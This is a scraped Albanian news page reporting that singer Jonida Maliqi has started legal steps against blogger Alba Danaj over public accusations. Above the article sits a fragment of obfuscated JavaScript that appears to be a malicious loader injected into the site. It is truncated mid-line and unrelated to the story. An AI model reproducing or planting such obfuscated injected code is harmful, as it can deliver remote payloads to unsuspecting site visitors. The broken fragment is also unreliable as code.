;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

E konfirmon Jonida Maliqi: Nis procedurat për padi ndaj ish mikes

By

Ditën e sotme lajmi se Jonida do të hedhë në gjyq ish miken e saj ishte kudo në mediat e shkruara online.

Vajza në fjalë, blogerja Alba Danaj kishte ironizuar deklaratën e këngëtares kur kjo e fundit kishte thënë se nuk do të blinte kurrë çanta “më të vogla se pëllëmba e dorës”. Madje, ajo foli dhe për disa ‘borxhe’ nga ana e Jonidës, e që ka shumë hapësira bosh që e bën të pamundur të kuptohet saktë deklarata e saj.

Po ashtu Jonida me anë të një video deklarate në llogarinë e saj në Instagram, thotë se ndërmori këtë hap për të dërguar këtë mesazh, pasi që ajo e ka bllokuar në rrjetet e saj sociale. Po ashtu nuk do të merret më shumë me çështjen sepse do të ndërmarrë hapa ligjor për ta qartësuar një herë e mirë.

Këto akuza që Alba Danaj i ka bërë në mënyrë kaq publike, në fakt në botën ligjore kjo përkthehet si padi për shpifje publike, nëse provohen të jenë të pa vërteta.

Kontaktuar nga Prive.al, Jonida konfirmoi se ka nisur procedurat ligjore ndaj Albës duke thënë, “Gjithçka është e vërtetë, kam ndërmarrë hapa ligjore me avokat. Ende nuk ka një padi por komunikime zyrtare siç e kërkon ligji.” /Prive.al

Artikuj të ngjashëm